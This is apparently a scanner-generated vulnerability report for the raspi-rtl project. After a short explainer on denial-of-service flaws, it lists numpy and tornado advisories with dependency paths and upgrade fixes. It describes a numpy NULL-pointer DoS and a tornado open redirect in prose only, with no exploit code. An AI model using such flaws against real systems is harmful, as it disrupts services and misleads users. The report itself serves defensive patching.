Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade numpy to version 1.22.0rc1 or higher.
References
low severity
- Vulnerable module: numpy
- Introduced through: numpy@1.21.3 and bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › numpy@1.21.3Remediation: Upgrade to numpy@1.22.2.
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › numpy@1.21.3Remediation: Upgrade to bokeh@3.2.2.
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays.
Note: This may likely only happen if application memory is already exhausted, as it requires the newdescr object of the PyArray_DescrNew to evaluate to NULL.
Remediation
Upgrade numpy to version 1.22.2 or higher.
References
low severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Open Redirect via the StaticFileHandler class, due to improper validation of the default_filename parameter in the initialize function.
Exploiting this vulnerability is possible under specific configurations and might result in a redirect to an attacker-controlled site.
Note: This vulnerability is still under analysis and we are following up with the maintainers to confirm it.
Remediation
Upgrade tornado to version 6.3.2 or higher.